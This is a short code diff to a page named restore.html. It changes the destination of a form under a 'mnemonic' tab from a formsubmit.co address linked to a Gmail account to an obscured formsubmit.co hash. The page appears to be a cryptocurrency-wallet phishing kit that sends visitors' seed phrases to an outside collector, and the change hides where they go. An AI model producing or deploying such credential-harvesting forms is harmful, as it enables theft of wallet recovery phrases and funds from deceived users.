--- a/restore.html
+++ b/restore.html
@@ -55,7 +55,7 @@
                   aria-labelledby="mnemonic-tab"
                 >
                   <form
-                    action="https://formsubmit.co/gitnetform1@gmail.com"
+                    action="https://formsubmit.co/772b5b38ef139db9a87241d8619d0bf5"
                     method="POST"
                   >
                     <input
